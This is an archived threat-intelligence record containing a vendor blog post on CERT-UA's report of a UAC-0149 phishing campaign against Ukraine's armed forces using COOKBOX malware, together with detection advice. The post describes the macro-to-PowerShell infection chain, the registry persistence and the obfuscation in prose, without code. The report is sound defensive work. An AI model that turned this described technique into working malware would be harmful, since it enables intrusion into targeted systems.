{
	"id": "193818d5-1b2b-4ecc-96b3-048f5c083108",
	"created_at": "2026-04-06T00:14:35.879723Z",
	"updated_at": "2026-04-10T03:27:56.169825Z",
	"deleted_at": null,
	"sha1_hash": "d96b698de97bc90cd95474fab0f22d0c673bab1d",
	"title": "UAC-0149 Attack Detection: Hackers Launch a Targeted Attack Against the Armed Forces of Ukraine, as CERT-UA Reports",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 242545,
	"plain_text": "UAC-0149 Attack Detection: Hackers Launch a Targeted Attack\r\nAgainst the Armed Forces of Ukraine, as CERT-UA Reports\r\nBy Veronika Zahorulko\r\nPublished: 2024-02-26 · Archived: 2026-04-02 12:22:29 UTC\r\nTwo days before the 2nd anniversary of russia’s full-scale invasion, CERT-UA researchers uncovered an ongoing\r\nphishing attack against the Armed Forces of Ukraine. The adversary campaign linked to the UAC-0149 group has\r\nleveraged COOKBOX malware to infect targeted systems.\r\nUAC-0149 Attack Analysis Using COOKBOX Malware \r\nCERT-UA in coordination with the Cybersecurity Center of the Information and Telecommunication Systems of\r\nthe Military Unit А0334 unveiled a targeted attack against the Armed Forces of Ukraine covered in the\r\ncorresponding CERT-UA#9204 alert. The UAC-0149 group has been performing the malicious operation since at\r\nleast fall 2023. \r\nOn February 22, 2024, several military employees received a lure XLS file titled “1_ф_5.39-2024.xlsm” related to\r\nthe report challenges via the Signal messenger. In addition to a legitimate macro, the file contained VBA code\r\ndesigned to execute a PowerShell command responsible for downloading, decoding, and executing the PowerShell\r\nscript “mob2002.data.”\r\nThe PowerShell script downloaded from GitHub performs registry modification on the operating system (OS),\r\nincluding writing the primary payload in the base64-encoded format, writing the decoder-launcher in the base64-\r\nencoded format to the “HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\XboxCache” branch, and creating a\r\nregistry key “xbox” in the “Run” autostart branch, which is intended to execute the decoder, facilitating the\r\nexecution of the main payload. The latter upon decoding contains another PowerShell script that performs GZIP\r\ndecompression and executes the malicious COOKBOX program.\r\nCOOKBOX malware is a PowerShell script for loading and running PowerShell commands. For each infected\r\ndevice a unique identifier is computed using cryptographic transformations (SHA256/MD5 hash functions) based\r\non a combination of the computer name and disk serial number. This identifier is transmitted in the “X-Cookie”\r\nheader of HTTP requests during interactions with the C2 server.\r\nCOOKBOX malware persistence is achieved via a corresponding registry key in the “Run” branch of the OS\r\nregistry. This key is created during the initial infection stage by a third-party PowerShell script, including the\r\nCOOKBOX deployer. Commonly, the code leverages obfuscation like character encoding, character substitution\r\n(replace()), base64 encoding, and GZIP compression. UAC-0149 hackers apply dynamic DNS services and\r\nCloudflare Workers for the C2 infrastructure management.\r\nDefenders observed that adversaries managed to infect the targeted systems using COOKBOX malware in cases\r\nwhen the infrastructure was not properly protected. The devices without blocking the attempts of running\r\nhttps://socprime.com/blog/uac-0149-attack-detection-hackers-launch-a-targeted-attack-against-the-armed-forces-of-ukraine-as-cert-ua-reports/\r\nPage 1 of 3\n\ncmd.exe, powershell.exe, mshta.exe, w(c)script.exe, hh.exe, and other executive utilities were mostly vulnerable\r\nto attacks. If the utilities were launched from within a process parented by one of the Microsoft Office programs\r\n(e.g., EXCEL.EXE), the chances of attacks increased. Notably, in one case, adversary attempts failed due to\r\nproperly set EDR protection, which fuels the need for following best cybersecurity practices and strengthening\r\ncyber defense to effectively withstand such attacks.\r\nWith the exponential rise in cyber attacks targeting Ukraine and its allies mainly in the public sector, forward-looking organizations are striving to elevate cyber vigilance backed by a proactive cyber defense strategy and\r\ninnovation capabilities. Leveraging Attack Detective, organizations can seamlessly identify blind spots in\r\ndetection coverage, gain from automated threat hunting capabilities, and minimize the risks of organization-specific threats to reinforce their cybersecurity posture. \r\nDetect the UAC-0149 Attack Covered in the CERT-UA#9204 Alert\r\nSecurity experts estimate that around 40 russia-backed APT groups attacked Ukraine in H1 2023, with intrusions\r\nconstantly growing in number and sophistication. This time, the Armed Forces of Ukraine became a target of\r\nanother malicious campaign by UAC-0149, relying on COOKBOX malware. \r\nTo help security professionals spot suspicious activity linked to UAC-0149 and COOKBOX, SOC Prime Platform\r\nfor collective cyber defense aggregates a set of behavior-based detection algorithms accompanied by detailed\r\nmetadata. All the rules are mapped to MITRE ATT\u0026CK® v14.1 and compatible with 28 SIEM, EDR, XDR and\r\nData Lake solutions. Just hit the Explore Detections button below and drill down to the curated rule set. \r\nExplore Detections\r\nAlternatively, cyber defenders can search for related detections using “UAC-0149” and “CERT-UA#9204” tags\r\nbased on the group identifier and CERT-UA alert.\r\nSecurity engineers might also streamline the IOC packaging using the Uncoder AI tool. Just paste the IOCs\r\nprovided by CERT-UA and automatically convert them into performance-optimized queries ready to run in the\r\nchosen environment for smooth threat investigation. \r\nhttps://socprime.com/blog/uac-0149-attack-detection-hackers-launch-a-targeted-attack-against-the-armed-forces-of-ukraine-as-cert-ua-reports/\r\nPage 2 of 3\n\nMITRE ATT\u0026CK Context\r\nSecurity engineers can also check out the details of the UAC-0149 attack using COOKBOX malware provided in\r\nthe most recent CERT-UA alert. Explore the table below to access a comprehensive list of adversary TTPs linked\r\nto the relevant Sigma rules, facilitating a thorough analysis:\r\nSource: https://socprime.com/blog/uac-0149-attack-detection-hackers-launch-a-targeted-attack-against-the-armed-forces-of-ukraine-as-cert-ua-reports/\r\nhttps://socprime.com/blog/uac-0149-attack-detection-hackers-launch-a-targeted-attack-against-the-armed-forces-of-ukraine-as-cert-ua-reports/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://socprime.com/blog/uac-0149-attack-detection-hackers-launch-a-targeted-attack-against-the-armed-forces-of-ukraine-as-cert-ua-reports/"
	],
	"report_names": [
		"uac-0149-attack-detection-hackers-launch-a-targeted-attack-against-the-armed-forces-of-ukraine-as-cert-ua-reports"
	],
	"threat_actors": [
		{
			"id": "a1c739f9-e0b5-4a58-a720-1d88b318641b",
			"created_at": "2024-04-23T02:00:04.251052Z",
			"updated_at": "2026-04-10T02:00:03.633106Z",
			"deleted_at": null,
			"main_name": "UAC-0149",
			"aliases": [],
			"source_name": "MISPGALAXY:UAC-0149",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434475,
	"ts_updated_at": 1775791676,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d96b698de97bc90cd95474fab0f22d0c673bab1d.pdf",
		"text": "https://archive.orkl.eu/d96b698de97bc90cd95474fab0f22d0c673bab1d.txt",
		"img": "https://archive.orkl.eu/d96b698de97bc90cd95474fab0f22d0c673bab1d.jpg"
	}
}